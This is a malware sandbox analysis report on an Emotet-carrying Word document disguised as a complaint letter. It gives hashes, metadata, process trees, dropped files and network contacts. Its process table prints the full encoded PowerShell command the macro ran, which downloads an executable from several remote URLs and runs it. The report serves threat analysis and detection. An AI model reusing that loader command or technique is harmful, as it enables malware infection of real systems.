File name: | Complaint from 11_05_2019.doc |
Full analysis: | https://app.any.run/tasks/f04068e1-1128-4943-9e86-4dc6afb72079 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 14:51:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Dolorum magnam at., Author: Belo Bahno, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Nov 4 21:57:00 2019, Last Saved Time/Date: Mon Nov 4 21:57:00 2019, Number of Pages: 1, Number of Words: 37, Number of Characters: 211, Security: 0 |
MD5: | C88270CDCF66121C5D27BCD28584DAEC |
SHA1: | 44FB953A81A9CAD354EAD8323694281E09D1F825 |
SHA256: | DACD64F04CAF7E87BBB8214EB8ABD58C91628C08C18E8068AA1D84575F7D350A |
SSDEEP: | 6144:TbSRZDlzfhxYAgOLA+bPMpzCyFU+QrA/2:TbSRZDlzfNgUjbPGCMU+y |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Tag_MarkAsFinal: | -1 |
---|---|
CodePage: | Windows Latin 1 (Western European) |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 247 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
Security: | None |
Characters: | 211 |
Words: | 37 |
Pages: | 1 |
ModifyDate: | 2019:11:04 21:57:00 |
CreateDate: | 2019:11:04 21:57:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | - |
Comments: | - |
Keywords: | - |
Author: | Belo Bahno |
Subject: | - |
Title: | Dolorum magnam at. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1160 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Complaint from 11_05_2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3976 | powershell -enco JABPAGEAeQBwAHoAZAB5AG8APQAnAEIAdgB2AGcAbQBpAGoAaABsAHQAawAnADsAJABHAHkAbwBxAHYAZwBsAGYAcwBwAHkAbgBqACAAPQAgACcANgA3ADEAJwA7ACQAWgBkAGsAYwBhAHQAeQBqAHAAdAA9ACcAVgBkAGgAcwBoAGsAcABhAHQAawBwAHkAZwAnADsAJABWAHEAcgBsAHMAYQB3AGYAeAB0AHQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEcAeQBvAHEAdgBnAGwAZgBzAHAAeQBuAGoAKwAnAC4AZQB4AGUAJwA7ACQARgB4AHIAcwB4AG8AbgBxAHcAcwB3AD0AJwBSAHMAZwBiAHAAcABuAGcAegAnADsAJABRAGMAZAByAGIAcgBiAGQAcgBsAG0APQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQB0AC4AVwBFAGIAQwBsAGkAZQBuAHQAOwAkAEYAdgBvAHQAdQBlAHEAYgA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGkAbwBpADMALgBjAG8AbQAvAGUAdABxAGcAYwAvAHEAagBYAEcAYQBLAHoAYgB1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGUAbgB0AG8AcgBzAHAAZQBkAGkAYQAuAGMAbwBtAC8AegB2AG0AMQAvAGIAZwBkAEgARgBhAGYAZQAvACoAaAB0AHQAcAA6AC8ALwBkAGUAdgAuAHIAdgBhAHQAZQBjAGgALgBvAHIAZwAvAHcAcAAtAGEAZABtAGkAbgAvAEIAawBQAHQATQB1AFgAaAAvACoAaAB0AHQAcABzADoALwAvAGwAZQB2AGUAbAA3ADUANwAuAGMAbwBtAC8AcAByAG8AagBlAGMAdABzAC8AYQBkAHYAYQBuAGMAZQBkAC8AawAyADQAZABrAHMAZwBvAC0AagBkADMANQBoAHEAbQAtADAAMgA3ADAANAA1ADUALwAqAGgAdAB0AHAAOgAvAC8AdABhAGsAYQBzAGEAZwBvAC0AawBpAHQAYQAuAGMAaABpAGIAaQBrAGsAbwAtAGwAYQBuAGQALgBqAHAALwB3AHAALwBjAHkAbQBvAGIAZwBjAHEAMgAtAGQAegB4AC0ANQA1ADUALwAnAC4AIgBzAHAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAWgBiAGwAcgBwAG8AbQB2AHQAZQA9ACcAWABhAHUAaQBpAG0AbAB6AGwAdwAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwBtAGoAYwBjAHAAaABhAGoAZwBjAGgAZgAgAGkAbgAgACQARgB2AG8AdAB1AGUAcQBiACkAewB0AHIAeQB7ACQAUQBjAGQAcgBiAHIAYgBkAHIAbABtAC4AIgBkAE8AdwBOAGAAbABvAGAAQQBEAGAARgBJAGwARQAiACgAJABTAG0AagBjAGMAcABoAGEAagBnAGMAaABmACwAIAAkAFYAcQByAGwAcwBhAHcAZgB4AHQAdAApADsAJABBAGQAbgBpAHIAdABpAGYAZQBnAD0AJwBDAHYAYQBoAGYAYQB0AGEAeQBoAGoAYgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFYAcQByAGwAcwBhAHcAZgB4AHQAdAApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADMANgA3ADUAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAHIAdAAiACgAJABWAHEAcgBsAHMAYQB3AGYAeAB0AHQAKQA7ACQAVABvAHUAegBjAHIAYgBxAGwAPQAnAEUAegB3AG0AZwBxAGgAeQBnACcAOwBiAHIAZQBhAGsAOwAkAEQAdABrAGQAagBrAHQAdQBtAG0APQAnAE8AcgBrAGcAcQBlAGEAZQBwAGgAYgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAG0AYQBzAHQAeABhAHMAaABrAGEAbwA9ACcAUQB4AHIAbwByAHQAawBoAHUAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB5D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3976 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YX5O42GRLZSHNCL2I8ZB.temp | — | |
MD5:— | SHA256:— | |||
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EC061EF.wmf | wmf | |
MD5:4901FDA4D969892496D9C32CAF950699 | SHA256:B0AE0083038CF002A9D51E390FE7CB8238AA2AFF3A9A255074F1CCE0256798D0 | |||
1160 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6AAB9CA27F6D3E541292196F7C5B86F3 | SHA256:EE1618B82D891F8400937A45217EF20AF3427A36F945447E05537ACC0315DD03 | |||
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F4518D2.wmf | wmf | |
MD5:C72BCFED6D45D52620986B885CE8B254 | SHA256:D137B038410A9F4EF2E57FB3D06BDC23C366C313D8411BE53EAA43CA989AC81D | |||
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D593F0D5.wmf | wmf | |
MD5:D46477AF55E11A5874F5C1CA693591B2 | SHA256:C187D180FCF20B438D0CD6B43A1FD8002DD01870A53EAD1CA9F6531B8BF3726F | |||
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FAE7EEAB.wmf | wmf | |
MD5:3F2B6EDBAF5EA79369FC31A079DEAC39 | SHA256:425D5507AE5FF861610E1EED8D723936C1F6391B07453F591AD3208CA7D82845 | |||
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A0040FC.wmf | wmf | |
MD5:EBEC1715A9B54681B9AA046B43B00706 | SHA256:675EF5DAC133FB8820F00867D477B909DCB207CC170C8A93C1FAC84A7799B65D | |||
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$mplaint from 11_05_2019.doc | pgc | |
MD5:8138EC10E1147AF0E07929CC3D035A29 | SHA256:352C8C27FCA27D2C22D6C59F3401277192880A302DDF99FEFF1EFE5BEED1AA9B | |||
1160 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F6368F1.wmf | wmf | |
MD5:8BF461A284F325A8156EC0B6A341AAE9 | SHA256:EAD1A9103DA2FBC72D8CCD61E68B5BCFB4CC45D2383CB725E00DD20E31A5719F |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3976 | powershell.exe | 172.1.1.1:80 | www.ioi3.com | AT&T Services, Inc. | US | unknown |
3976 | powershell.exe | 198.12.145.239:443 | www.mentorspedia.com | GoDaddy.com, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.ioi3.com |
| suspicious |
dns.msftncsi.com |
| shared |
www.mentorspedia.com |
| suspicious |